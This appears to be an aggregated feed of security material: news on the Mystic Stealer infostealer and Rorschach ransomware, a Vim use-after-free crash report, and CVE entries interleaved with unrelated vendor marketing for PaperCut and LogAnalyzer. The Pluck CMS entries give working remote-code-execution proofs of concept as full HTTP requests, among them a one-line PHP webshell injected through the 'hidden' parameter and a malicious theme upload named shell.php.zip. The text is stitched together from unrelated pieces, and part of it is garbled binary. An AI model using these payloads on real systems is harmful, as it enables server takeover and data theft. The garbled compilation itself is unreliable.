A criminal crowd-sourcing campaign has led to swift adoption of the stealer, which can pilfer key computer data, credentials from browsers and chat apps, and cryptocurrency from multiple wallets.

A stealthy stealer that can lift credentials from scores of Web browsers and extensions, and steal cryptocurrency, has quickly become a favorite of cybercriminals since it first appeared on underground marketplaces in April.

The Mystic Stealer has established a strong foothold in the threat landscape in only its first several months of existence thanks to a combination of advanced capabilities, pricing, and the crowdsourcing of recommendations that have led to ongoing updates and improvements. That's according to two simultaneously released reports, one by Cyfirma and the other a collaboration between Inquest and Zscaler.

The stealer — which typically goes for a subscription fee of $150 per month, or $390 for a three-month subscription — has similar capabilities to pilfer data from a victim's computer to other forms of this type of malware, paired with obfuscation techniques that make it, by design, capable of advanced evasion, the researchers said.

"It seems clear that the developer of Mystic Stealer is looking to produce a stealer on par with the current trends of the malware space while attempting to focus on anti-analysis and defense evasion," Zscaler researchers wrote in their post.

Mystic Stealer can steal a wide array of information, ranging from computer data such as the system hostname, username, and GUID, to credentials from nearly 40 Web browsers and more than 70 browser extensions, they said. Additionally, it targets Bitcoin, DashCore, Exodus, or any other popular cryptocurrencies, and can steal Telegram and Steam credentials.

So far, the regions where researchers have found the most instances of attackers wielding Mystic Stealer are the US, Germany, Finland, France, and Russia, in that order.

**Commitment to Evasion & Malware Improvement**

Unique to Mystic Stealer compared to similar forms of malware is its inventors' vested interested in making it difficult to detect or analyze, as well as a commitment to continuously advancing its capabilities by appealing to its user base for feedback, the researchers said.

In terms of evasion, Mystic Stealer's code is heavily obfuscated, with its creators using polymorphic string obfuscation, hash-based import resolution, and runtime calculation of constants, as well as a custom binary protocol that is encrypted with RC4, according to InQuest and Zscaler.

But perhaps the key reason the malware has caught on so fast — with the researchers already discovering more than 50 actively operational command and control (C2) servers in only about two months — is that its creators did something unique soon after its release. That is, they made the stealer available for testing to underground forum veterans to verify its effectiveness and make suggestions for enhancement, which were incorporated into new versions of the stealer, noted Cyfirma researchers.

"The threat actor demonstrates an understanding of the significance of receiving validation from established members within the underground forum regarding the product," Cyfirma researchers wrote in their post. "Furthermore, the author of the product openly invites suggestions for additional improvements in the stealer, as is evident in the updated releases, which signifies an ongoing effort to enhance the product."

**Mystic Stealer De-Mystified: Technical Details**

On the technical side of things, Mystic Stealer is implemented in C for the client and Python for the control panel and is purported to target all Windows versions from XP to Windows 11, with support for both x86 and x64 architectures, according to Cyfirma.

It can evade detection by most AV products, operating in memory and using system calls for compromising targets, the researchers said. This ensures that no trace is left on the hard disk during the data exfiltration process.

"Once target data is identified, the malware compresses, encrypts, and transmits it," the Cyfirma researchers wrote. "Client authentication is not required; data is transmitted as it is received.

Moreover, its developers created the malware without reliance on third-party libraries for decrypting or in decoding target credentials, both reports noted, which is unique to stealer malware.

"Some leading stealer projects download DLL files post-install to implement functionality to extract credentials from files on the local system," the InQuest and Zscaler researchers wrote.

Instead, of doing this, Mystic Stealer collects and exfiltrates information from an infected system and then sends the data to the C2 server that handles parsing, they said.

"This is a different approach from many leading stealers and is likely an alternate design to keep the size of the stealer binary smaller and the intention less clear to file analyzers," the researchers wrote.

**Defending Against Infostealers**

With the quick spread of the particularly evasive Mystic Stealer — and the prevalence of stealer malware in general — the Cyfirma team recommends that organizations implement robust security measures to avoid compromise in the advent of an attack, the researchers said.

"Mystic Stealer poses substantial risks and potential impacts from the perspective of external threat landscape management," they wrote.

This should include a best-practices layered defense strategy that combines threat prevention technologies, up-to-date antivirus software, firewalls, intrusion detection systems, and regular security patching, which can significantly reduce the risk of Mystic Stealer infiltration, the researchers said.

Organizations should also put into place continuous monitoring of threat-intelligence sources by sharing threat information within security communities and leveraging threat-intelligence feeds so they can stay updated on the latest indicators of compromise associated with Mystic Stealer, the researchers said. "This allows for early detection, response, and mitigation efforts," they wrote.

Educating employees on security best practices, how to recognize phishing attempts — which may attempt to spread the stealer — and maintaining an overall culture of security awareness is also crucial to helping organizations avoid compromise, the researchers said.

Finally, every organization should have a strong incident-response plan in case of attack that includes communication protocols, forensics investigation processes, and backup and recovery strategies, they added.

Mysterious Mystic Stealer Spreads Like Wildfire in Mere Months

A Cross-Site Request Forgery (CSRF) vulnerability has been identified in
PaperCut NG/MF, which, under specific conditions, could potentially enable
an attacker to alter security settings or execute arbitrary code. This could
be exploited if the target is an admin with a current login session. Exploiting
this would typically involve the possibility of deceiving an admin into clicking
a specially crafted malicious link, potentially leading to unauthorized changes.


**Printing should be waste-free, easy, and secure...**

**DO YOU FIND PRINTING HARD?****Easily print from any device, anytime**

Printing is a boring part of IT because it should be, because it should “just work”. PaperCut empowers you to make printing easy again for your end users, whether they're printing from a BYOD or mobile device, and makes your life easy by auto-deploying print drivers. We’ve got truckloads more on offer, from industry-leading third-party integrations to easy tap-and-release Find-Me printing.

**WHAT WAS ON YOUR LAST UNCOLLECTED PRINTOUT?****Secure all documents before, during, and after printing**

Organizations spend a fortune protecting their digital data but a leak could be as simple as leaving a document on the printer. Control device access, implement secure print release or even digitally sign and watermark your print jobs to take security to a new level.

**WAS YOUR LAST JOB DOUBLE-SIDED?****Shrink your footprint and your bills**

Waste reduction and cost control is not about using a stick, it’s about subtly changing user behavior (a stick may help!). PaperCut is packed full of features such as encouraging duplex printing, implementing reasonable usage quotas, and full pay-for-print and print chargeback policies.

Did you know that when we surveyed our customers, we found that implementing just one feature, like secure print release, helped them save as much as 15%.

**SPRING UPDATE****PaperCut ranked #1 in Print Management**

Compare ratings for each primary feature and learn how PaperCut can help you save.

GET REPORT

**OUR PURPOSE****Crafting better environments**

At PaperCut we don't measure our success by profits and business metrics. Our success is the Forest Positive impact we've made on the planet, thanks to over 100 million users at over 70,000 organizations around the world who have saved billions of pages.

It's about the environments we create, the long-lasting relationships with our customers, the team that builds the tech, and how we make the world a better place.

Learn about us

**139M**

Smiling users

**89K**

Happy organizations

**30**

Languages

**195+**

Countries

**OUR PRODUCTS****Any brand, any platform, all environments**

It doesn't matter what size your organization is, what printers you use, or what operating system your users prefer – PaperCut is for you. We take a cross-platform, vendor-neutral approach to technology to deliver a print management solution that just works.

As techies, we love Windows, Linux, Mac, Chromebook, Android, iOS and yes... even Novell ;-)

   

EXPLORE PRODUCTS

CVE-2023-2533: PaperCut: Print management software

Buffer Overflow vulnerability in VIM v.8.1.2135 allows a remote attacker to execute arbitrary code via the operand parameter.

**VIM Version:**

    $ ./vim --version
    VIM - Vi IMproved 8.1 (2018 May 18, compiled Oct 10 2019 22:18:57)
    Included patches: 1-2133
    Compiled by input0@zero
    Huge version without GUI.  Features included (+) or not (-):
    +acl               -farsi             -mouse_sysmouse    -tag_any_white
    +arabic            +file_in_path      +mouse_urxvt       -tcl
    +autocmd           +find_in_path      +mouse_xterm       +termguicolors
    +autochdir         +float             +multi_byte        +terminal
    -autoservername    +folding           +multi_lang        +terminfo
    -balloon_eval      -footer            -mzscheme          +termresponse
    +balloon_eval_term +fork()            +netbeans_intg     +textobjects
    -browse            +gettext           +num64             +textprop
    ++builtin_terms    -hangul_input      +packages          +timers
    +byte_offset       +iconv             +path_extra        +title
    +channel           +insert_expand     -perl              -toolbar
    +cindent           +job               +persistent_undo   +user_commands
    +clientserver      +jumplist          +postscript        +vartabs
    +clipboard         +keymap            +printer           +vertsplit
    +cmdline_compl     +lambda            +profile           +virtualedit
    +cmdline_hist      +langmap           -python            +visual
    +cmdline_info      +libcall           -python3           +visualextra
    +comments          +linebreak         +quickfix          +viminfo
    +conceal           +lispindent        +reltime           +vreplace
    +cryptv            +listcmds          +rightleft         +wildignore
    +cscope            +localmap          -ruby              +wildmenu
    +cursorbind        -lua               +scrollbind        +windows
    +cursorshape       +menu              +signs             +writebackup
    +dialog_con        +mksession         +smartindent       +X11
    +diff              +modify_fname      -sound             +xfontset
    +digraphs          +mouse             +spell             -xim
    -dnd               -mouseshape        +startuptime       -xpm
    -ebcdic            +mouse_dec         +statusline        +xsmp_interact
    +emacs_tags        -mouse_gpm         -sun_workshop      +xterm_clipboard
    +eval              -mouse_jsbterm     +syntax            -xterm_save
    +ex_extra          +mouse_netterm     +tag_binary        
    +extra_search      +mouse_sgr         -tag_old_static    
       system vimrc file: "$VIM/vimrc"
         user vimrc file: "$HOME/.vimrc"
     2nd user vimrc file: "~/.vim/vimrc"
          user exrc file: "$HOME/.exrc"
           defaults file: "$VIMRUNTIME/defaults.vim"
      fall-back for $VIM: "/usr/local/share/vim"
    Compilation: afl-clang-fast -c -I. -Iproto -DHAVE_CONFIG_H     -g -O2 -U_FORTIFY_SOURCE -D_FORTIFY_SOURCE=1       
    Linking: afl-clang-fast   -L/usr/local/lib -Wl,--as-needed -o vim    -lSM -lICE -lXpm -lXt -lX11 -lXdmcp -lSM -lICE  -lm -ltinfo -lelf -lnsl  -ldl           
    

**MData:**

    While fuzzing VIM with enabling different mode an use-after-free was observed. This is 
    likely  a write access violation, which means the attacker may have control over the 
    write address and value.  
    

**GDB BT:**

    (gdb) run -u NONE -X -Z -e -s -S out/id\:000001\,sig\:11\,src\:018487\,time\:45124324+017124\,op\:splice\,rep\:8 -c ':qa!'
    Starting program: /home/input0/nvim/vim/src/vim -u NONE -X -Z -e -s -S out/id\:000001\,sig\:11\,src\:018487\,time\:45124324+017124\,op\:splice\,rep\:8 -c ':qa!'
    [Thread debugging using libthread_db enabled]
    Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
    
    Program received signal SIGSEGV, Segmentation fault.
    0x000000000041adeb in bt_terminal (buf=0x7ffff6c3fca0 <main_arena+96>) at buffer.c:5307
    5307	    return buf != NULL && buf->b_p_bt[0] == 't';
    (gdb) bt 
    #0  0x000000000041adeb in bt_terminal (buf=0x7ffff6c3fca0 <main_arena+96>) at buffer.c:5307
    #1  0x00000000008ed15d in win_enter_ext (wp=<optimized out>, undo_sync=<optimized out>, curwin_invalid=0, 
        trigger_new_autocmds=<optimized out>, trigger_enter_autocmds=<optimized out>, trigger_leave_autocmds=<optimized out>) at window.c:4658
    #2  0x00000000008e8b02 in win_split_ins (size=<optimized out>, flags=<optimized out>, new_wp=<optimized out>, dir=<optimized out>)
        at window.c:1326
    #3  0x00000000008e0f1f in win_split (size=0, flags=0) at window.c:812
    #4  0x0000000000409e23 in do_argfile (eap=0x7fffffffa890, argn=0) at arglist.c:662
    #5  0x00000000005214bd in do_one_cmd (sourcing=<optimized out>, cstack=<optimized out>, cmdlinep=<optimized out>, fgetline=<optimized out>, 
        cookie=<optimized out>) at ex_docmd.c:2470
    #6  do_cmdline (cmdline=<optimized out>, fgetline=<optimized out>, cookie=<optimized out>, flags=<optimized out>) at ex_docmd.c:966
    #7  0x00000000007a0b32 in do_source (fname=<optimized out>, check_other=<optimized out>, is_vimrc=<optimized out>) at scriptfile.c:1214
    #8  0x000000000079f5b9 in cmd_source (fname=0xc4f583 "out/id:000001,sig:11,src:018487,time:45124324+017124,op:splice,rep:8", 
        eap=<optimized out>) at scriptfile.c:805
    #9  0x00000000005214bd in do_one_cmd (sourcing=<optimized out>, cstack=<optimized out>, cmdlinep=<optimized out>, fgetline=<optimized out>, 
        cookie=<optimized out>) at ex_docmd.c:2470
    #10 do_cmdline (cmdline=<optimized out>, fgetline=<optimized out>, cookie=<optimized out>, flags=<optimized out>) at ex_docmd.c:966
    #11 0x000000000096e6c9 in exe_commands (parmp=<optimized out>) at main.c:3133
    #12 vim_main2 () at main.c:795
    #13 0x000000000096b597 in main (argc=<optimized out>, argv=<optimized out>) at main.c:444
    (gdb) i r
    rax            0xfffffffffffffffc	-4
    rbx            0xc6dae0	13032160
    rcx            0x0	0
    rdx            0xc27900	12744960
    rsi            0x0	0
    rdi            0x7ffff6c3fca0	140737333427360
    rbp            0xc6dae8	0xc6dae8
    rsp            0x7fffffff96c8	0x7fffffff96c8
    r8             0x5f	95
    r9             0x1	1
    r10            0x7fffffff8c60	140737488325728
    r11            0x0	0
    r12            0x1	1
    r13            0x0	0
    r14            0xfffffffffffffffc	-4
    r15            0x1	1
    rip            0x41adeb	0x41adeb <bt_terminal+75>
    eflags         0x10206	[ PF IF RF ]
    cs             0x33	51
    ss             0x2b	43
    ds             0x0	0
    es             0x0	0
    fs             0x0	0
    gs             0x0	0
    (gdb) 
    

**ASAN BT:**

    ==14666==ERROR: AddressSanitizer: heap-use-after-free on address 0x62500000f108 at pc 0x000000db2301 bp 0x7ffcbdb68e70 sp 0x7ffcbdb68e68
    READ of size 8 at 0x62500000f108 thread T0
        #0 0xdb2300 in win_enter_ext /home/input0/vim/src/window.c:4658:25
        #1 0xda89af in win_split_ins /home/input0/vim/src/window.c:1326:5
        #2 0xd9b007 in win_split /home/input0/vim/src/window.c:812:12
        #3 0x516344 in do_argfile /home/input0/vim/src/arglist.c:662:10
        #4 0x7120d0 in do_one_cmd /home/input0/vim/src/ex_docmd.c:2470:2
        #5 0x7120d0 in do_cmdline /home/input0/vim/src/ex_docmd.c:966
        #6 0xb60432 in do_source /home/input0/vim/src/scriptfile.c:1214:5
        #7 0xb5e5bf in cmd_source /home/input0/vim/src/scriptfile.c:805:14
        #8 0x7120d0 in do_one_cmd /home/input0/vim/src/ex_docmd.c:2470:2
        #9 0x7120d0 in do_cmdline /home/input0/vim/src/ex_docmd.c:966
        #10 0xe9998f in exe_commands /home/input0/vim/src/main.c:3133:2
        #11 0xe9998f in vim_main2 /home/input0/vim/src/main.c:795
        #12 0xe94b2c in main /home/input0/vim/src/main.c:444:12
        #13 0x7f32b72bbb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
        #14 0x41ff49 in _start (/home/input0/vim/src/vim+0x41ff49)
    
    0x62500000f108 is located 8 bytes inside of 8664-byte region [0x62500000f100,0x6250000112d8)
    freed by thread T0 here:
        #0 0x4d53e8 in __interceptor_free.localalias.0 (/home/input0/vim/src/vim+0x4d53e8)
        #1 0x8f411e in vim_free /home/input0/vim/src/misc2.c:1802:2
        #2 0x5270ea in apply_autocmds /home/input0/vim/src/autocmd.c:1607:12
        #3 0xda89af in win_split_ins /home/input0/vim/src/window.c:1326:5
        #4 0xd9b007 in win_split /home/input0/vim/src/window.c:812:12
    
    previously allocated by thread T0 here:
        #0 0x4d55a0 in malloc (/home/input0/vim/src/vim+0x4d55a0)
        #1 0x8ef102 in lalloc /home/input0/vim/src/misc2.c:924:11
        #2 0xd9b007 in win_split /home/input0/vim/src/window.c:812:12
    
    SUMMARY: AddressSanitizer: heap-use-after-free /home/input0/vim/src/window.c:4658:25 in win_enter_ext
    Shadow bytes around the buggy address:
      0x0c4a7fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c4a7fff9de0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c4a7fff9df0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c4a7fff9e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c4a7fff9e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    =>0x0c4a7fff9e20: fd[fd]fd fd fd fd fd fd fd fd fd fd fd fd fd fd
      0x0c4a7fff9e30: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
      0x0c4a7fff9e40: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
      0x0c4a7fff9e50: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
      0x0c4a7fff9e60: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
      0x0c4a7fff9e70: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
    ==14666==ABORTING
    

**To Reproduce:** vim -u NONE -X -Z -e -s -S $POC -c ':qa!'

CVE-2020-20703: UAF: Access violation near NULL on destination operand · Issue #5041 · vim/vim

File Upload vulnerability in PluckCMS v.4.7.10 dev versions allows a remote attacker to execute arbitrary code via a crafted image file to the the save_file() parameter.

admin.php:

language.php：

save\_file():

"../../../images/wphp.jpg" Be written to \\data\\settings\\langpref.php

Users can upload a picture file containing malicious code to getshell.

POST /pluck-4.7.10-dev1/admin.php?action=language HTTP/1.1  
Host: 127.0.0.1:83  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,_/_;q=0.8  
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Referer: http://127.0.0.1:83/pluck-4.7.10-dev1/admin.php?action=language  
Cookie: LQUKaS\_admin\_username=admin; Hm\_lvt\_f6f37dc3416ca514857b78d0b158037e=1570503836; PHPSESSID=a0bhen6shpeifgc20p0l23pmj1  
Connection: close  
Upgrade-Insecure-Requests: 1  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 70

cont1=../../../images/php.jpg&save=%E5%82%A8%E5%AD%98&cmd=echo "2333";

CVE-2020-20718: File contains vuln pluck 4.7.10 dev version · Issue #79 · pluck-cms/pluck

An issue discovered in Pluck CMS v.4.7.10-dev2 allows a remote attacker to execute arbitrary php code via the hidden parameter to admin.php when editing a page.

**Pluck-4.7.10-dev2 admin background exists a remote command execution vulnerability when creating a new web page**

Vulnerability location：  
data\\inc\\functions.admin.php 531-535 line  

Saves the hidden parameter passed by the POST request to php, but does not escape the special character (') in the value, which can directly close the php syntax remote execution command, such as phpinfo(), eval(), etc.

Demo：  
After the installation is successful, go to the management background.Create a new page, enter a title and content Select "Show webpage",submit the request and then grab the request packet to modify the value of the hidden parameter to "no"; phpinfo();'"  

    POST /pluck-4.7.10-dev2/admin.php?action=editpage HTTP/1.1
    Host: 192.168.80.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.80.1/pluck-4.7.10-dev2/admin.php?action=editpage
    Cookie: PHPSESSID=b01p8o9n85qbjq6f1tj50anlp3
    Connection: close
    Upgrade-Insecure-Requests: 1
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 131
    
    title=aaaa&seo_name=&content=%3Cp%3Eaaaa%3C%2Fp%3E&description=&keywords=&hidden=no';phpinfo();'&sub_page=&theme=default&save=%E5%82%A8%E5%AD%98
    

http://192.168.80.1/pluck-4.7.10-dev2/?file=aaaa  

Write a sentence Trojan

    POST /pluck-4.7.10-dev2/admin.php?action=editpage HTTP/1.1
    Host: 192.168.80.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.80.1/pluck-4.7.10-dev2/admin.php?action=editpage
    Cookie: PHPSESSID=b01p8o9n85qbjq6f1tj50anlp3
    Connection: close
    Upgrade-Insecure-Requests: 1
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 144
    
    title=bbbb&seo_name=&content=%3Cp%3Ebbbb%3C%2Fp%3E&description=&keywords=&hidden=no';@eval($_POST[b]);'&sub_page=&theme=default&save=%E5%82%A8%E5%AD%98
    

Use chopper connection

CVE-2020-20918: Pluck-4.7.10-dev2 admin background exists a remote command execution vulnerability when creating a new web page · Issue #80 · pluck-cms/pluck

Adiscon LogAnalyzer v4.1.13 and before is vulnerable to SQL Injection.

**View system messages via web**

Syslog messages  
Windows Events  
Status Reports  
Statistics  
Web based

  

Adiscon LogAnalyzer

  
Adiscon LogAnalyzer is a web inter-  
face to syslog and other network event data. It provides easy brow-  
sing, analysis of realtime network events and reporting services.

Reports

  
Reports help to keep an eye on network activity. It consolidate syslog and other event data providing an easy to read sheet. Charts help to see important things at a glance.

LogAnalyzer is part of Adiscon’s MonitorWare line of monitoring applications. It runs both under Windows and Unix/Linux. The database can be populated by MonitorWare Agent, WinSyslog or EventReporter on the Windows side and by rsyslog on the Unix/Linux side. LogAnalyzer itself is free, GPLed software (as are some other members of the product line).

CVE-2023-34600: Home - Adiscon LogAnalyzer

File upload vulnerability in Pluck CMS v.4.7.10-dev2 allows a remote attacker to execute arbitrary code and access sensitive information via the theme.php file.

pluck-cms<=4.7.10-dev4 admin background exists a remote command execution vulnerability when install a theme  
Demo:  
After the installation is successful, go to the management background.  
  
options->choose theme->install theme  
  

vul-url：  
http://192.168.80.1/pluck-4.7.10-dev3/admin.php?action=themeinstall  
According to the default template, the theme is faked with the content of the theme shell.php.zip as follows:  
  
Insert phpinfo(); in the theme.php file;  

upload

    POST /pluck-4.7.10-dev3/admin.php?action=themeinstall HTTP/1.1
    Host: 192.168.80.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.80.1/pluck-4.7.10-dev3/admin.php?action=themeinstall
    Cookie: PHPSESSID=en364hjlvg84vpdvmv9gdlc0h2
    Connection: close
    Upgrade-Insecure-Requests: 1
    Content-Type: multipart/form-data; boundary=---------------------------10771789627341
    Content-Length: 2441
    
    -----------------------------10771789627341
    Content-Disposition: form-data; name="sendfile"; filename="shell.php.zip"
    Content-Type: application/x-zip-compressed
    
    PK���     楽VO            
       shell.php/PK���   � 漇VO?K�?   ��  �   shell.php/info.phpe幧
    ?�嗭吘肞<j呼?鐴D$$?殟,趱M*侾標7薬p抡U譣??
    �?0?z?�N%???
    ?.?魫G_�?D尞锖i氌`祂?&犇 梿}? ?顪m?c]照j>胜?4A燫m??�桯[?>?�镗G�4慺蓈3阒F魠�?PK���   � 嫇OO蘺貔{�  ?  �   shell.php/style.css誚M彌0�=o~叆≧籞睝毻*?鞧玘zj?�喐k02&洿??�唋音凿惸虥?笃N溃=??p鴾�^f?r婆
    M?险{=箞y&?鞼鑷 A�n圖呔贸&丨^皭b懶l呠|窞糔&x舎?�m桡镛C?;镈$?K?�霥@8[ZPIⅢ?攖K蚊n鴸?簟z�囄R挄h扮?煦tt斤?杞煆驱3:?郚拃伹NMQ2厡h?檢n垭"荙D长?�?歭?y嬟〕
    罸璤h$7+碶ㄤ脩0U蘺A祎A�啀狤Fb群p?&戒虠?]_"鐌舚?@椬-?u?笖<�y 挛銫頥ク�6Do莀茇猰?緂??靷?Jw咁n栽讘<�?Es貦汛竻�覦嬄颖�k墐偝瞆| �!紂[垄ZN?刅}恶郎溃+=pGU菥|/梿倩?�??MS紮O业Z, 嵻3葥駥 ^蕚Fa??\@泴�?傗?氶﹚�x桷挩?钨(亵袪昀�鯫2?�?蛸�_江陰踴灶歳鐼_鳜og蹪~顳衜碬�K瞍m覐]@-锾?鐠�游J璋梀伶c�;h选To1p?+?0V蠁﹊"鹁襆臣琄b铧;A1籅_	?IC|??NA�?&�fわ?�姚.潥4�鉵5u尕o蝜?,�?ぢ?蟲?黋 _炧膿胬7?�偶睊�>I*�盡{;Dk�嘜乤遥墽Y摊写縛?駗囐Y昝d脂鷺b闔h|�?蕠瓞F/?霭澅琽瞀盡�k睬辵4_簝I鸜�捚?�O�N扇惋帖�?闂鷍	8?$=睋
    瀭?T窰1[�m觊D))
    ?还^gT�€�郪�3
    蚾€i擣 服h爓,(英?_!婀i線郯*GO�.%W抝�c摫胎?B痤lAⅤ萿酊�PK���   � 筍VO鱪鷸?  ?  �   shell.php/theme.php}S羘贎�=�?橒睩*?9�?�寓:�%FmOh?鉛斓e痗慂褫怠敀驸�蠜麈i<�M?�J�?BY��*F圖?JI�?牟D�\��猟飔;�#!戂d避豸+锳V 顒采}C 嶳 ???BF欇�v;�ot=?
    ~�?佌鷵繕傉斠Y0?_?�\?<〣剨淫?+V*浚串kЬu瞓K僄?*�襼賞�鍀;?Md9~C?�-?Mw	撣闭n�?�~鵼��B苪l`敞�7)*f聻?�=6=g|o"�?
    3轠aぎMv5奭PB%h,渇擝aS秢瓡w@=適次M适&UB> I剏睵塛詸kX??欎?Ju磛髺禍m祐	灛輁X;i:.@V 矷F3?u\?笶蒊濧\`t鰨?羭硚鬗�M箔悗?忨T?e�鼈<锌馏���g鐢'U�右\曞5瘹鉙<^�5w琮�PK��? �     楽VO            
     $       �       shell.php/
           � � 柭萵€堈�梷Kt€堈�袘€]y堈�PK��? �   � 漇VO?K�?   ��  � $           (   shell.php/info.php
           � � �4=t€堈�u�7瘈堈�]�?|堈�PK��? �   � 嫇OO蘺貔{�  ?  � $           ��  shell.php/style.css
           � � €怷DC冋�)A7瘈堈��l洹|堈�PK��? �   � 筍VO鱪鷸?  ?  � $           ?  shell.php/theme.php
           � � 9晸€堈�yg7瘈堈�?察z堈�PK��    � � ?  ?    
    -----------------------------10771789627341
    Content-Disposition: form-data; name="submit"
    
    Upload
    -----------------------------10771789627341--
    
    

**1.default theme**

  
View site  

**2.choose shell.php theme**

  

View site http://192.168.80.1/pluck-4.7.10-dev3/  

phpinfo();Function is executed

_**The vulnerability exists in the latest pluck-4.7.10-dev2 pluck-4.7.10-dev3. The pluck-4.7.10-dev4 version cannot be uploaded due to bugs in the program, but in theory the RCE vulnerability exists. In pluck-4.7.10-dev4 version**_

CVE-2020-20919: pluck-cms<=4.7.10-dev4 admin background exists a remote command execution vulnerability when install a theme · Issue #85 · pluck-cms/pluck

Cross Site Scripting vulnerability in Typora v.0.9.79 allows a remote attacker to execute arbitrary code via the mermaid sytax.

CVE-2020-21058: typora(0.9.79) XSS to RCE · Issue #2959 · typora/typora-issues

Learn how the latest ransomware variant has heightened attack execution speed and what that means for cybersecurity operations.

There has always been a competition in the ransomware world, with attackers trying to improve the speed of campaign execution and organizations continuously innovating to get ahead of those attacks. Speed is so decisive that ransomware-as-a-service (RaaS) platforms even advertise the speed of execution for prospective ransomware affiliates. LockBit, one of the most successful ransomware groups, has publicly listed its encryption speed versus its competitors' speed to demonstrate its advantage. In short, speed is critical on both sides of the ransomware battle.

Rorschach, one of the newest ransomware variants, has officially taken the "encryption speed king" title from LockBit 3.0. The Rorschach variant was first detected in April 2023 and is a customized strain of the Babuk ransomware code. Rorschach brings speed into the spotlight and warrants a closer look at how ransomware creators increase speed across multiple dimensions of their victims' environment.

**Malware Propagation Speed**

One important speed component is the ability to quickly spread malware as far and wide as possible. In the past, ransomware groups have leveraged many techniques for fast propagation, including supply chain attacks and using existing IT and security tools to propagate their malware.

However, Rorschach has built and demonstrated an interesting self-propagating and autonomous capability that leverages Active Directory (AD) Domain Group Policy Objects (GPO). This enables the malware to rapidly propagate across the network and execute ransomware on every endpoint at blistering speeds. Because of this, the Rorschach variant has pushed the needle further than ever with these interesting innovations for self-propagation.

To counter this innovation, organizations must adopt tools that combat self-propagation, such as active defense technology, which deals with ransomware in real time and detects attackers as soon as possible.

**Data Encryption Speed for Extortion**

On Windows endpoints, Rorschach's creators have carefully chosen to use HC-128, a stream cipher that encrypts large streams of file data with impressive performance. Rorschach ransomware uses the asymmetric key exchange method, which is based on Curve25519. It's efficient in both computational performance and memory consumption while simultaneously retaining strong security.

Like many other ransomware strains, including LockBit and Babuk, Rorschach encrypts only parts of a file instead of the entire file's contents. This tactic is known as intermittent encryption, which has become popular in the last couple of years for its efficiency and speed. Encrypting only parts of the file dramatically reduces the time required to complete the data encryption. By shortening the encryption phase of an attack, ransomware operators give security tools less opportunity to detect them. Data encryption is the visible part of an attack, and attackers are shortening that window to better their odds in the race against defenders.

Like LockBit and other well-known ransomware, Rorschach also leverages parallelism and multithreading for high-performance speedy encryption. Because Rorschach ransomware implementation is customized for each operating system type, it leverages specific Windows capabilities known as I/O completion ports for efficient multithreaded encryption. This technique is borrowed from LockBit 3.0, REvil, Hive, BlackMatter, and DarkSide.

While the data encryption speed rankings among ransomware gangs is interesting, it is important to note that virtually all modern ransomware variants already perform data encryption very quickly. Unfortunately, all are much faster than what most security teams or tools are equipped to deal with.

However, while Rorschach does outpace competitors in speed in some realms, it currently does not appear to exfiltrate data for double extortion. This is in comparison to other ransomware gangs, including LockBit, that first exfiltrate enterprise data. While data encryption is the visible part of a ransomware attack, data exfiltration is the invisible race against defenders. Ransomware actors typically exfiltrate large amounts of data for double extortion before beginning data encryption.

**Staying Under the Radar of Defenders**

One of Rorschach's particularly innovative moves is its ability to stay under the radar by using deception technology — a double-edged sword that is useful for attackers and defenders. Rorschach's advanced security evasion capabilities leverage deception techniques and concepts for malicious purposes, including using obfuscation techniques, valid domain user and service accounts, and argument spoofing techniques to hide the true capabilities of the ransomware.

This kind of defense evasion is new to ransomware threats, but it's not new in the cybersecurity world. To combat Rorschach's technique for self-propagation using AD GPOs and high-speed campaigns, defenders need solutions that can detect and respond to real-time, novel, and autonomous ransomware capabilities.

Rorschach ransomware has borrowed innovations from previously successful ransomware groups including LockBit, Babuk, and REvil and built on their success by adding lightning-fast innovations. The Rorschach variant demonstrates the importance of continuous defender innovation, as well as the need to counter attacker movement in real time.

Rorschach Ransomware: What You Need to Know

Symantec SiteMinder WebAgent version 12.52 suffers from a cross site scripting vulnerability.

